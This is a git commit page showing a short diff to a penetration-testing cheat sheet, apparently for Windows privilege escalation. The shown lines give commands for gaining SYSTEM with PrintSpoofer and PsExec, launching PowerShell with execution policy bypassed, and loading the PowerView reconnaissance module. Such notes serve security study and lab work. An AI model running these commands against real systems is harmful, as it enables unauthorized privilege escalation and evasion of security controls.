Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-03-17 23:43:59 +05:00 committed by GitHub
parent 1da73475f5
commit af3be40d54
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -249,6 +249,12 @@ If this is enabled we can upload `Printspoofer.exe ` and place it if we have rig
`PrintSpoofer.exe -i -c powershell.exe`
### Becoming NT\AUTHORITY (If user is in local administrators group)
If the system has `PsExec.exe` open elevated cmd
`.\PsExec.exe -i -s cmd.exe`
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>
`. .\PowerView.ps1` import the PowerView module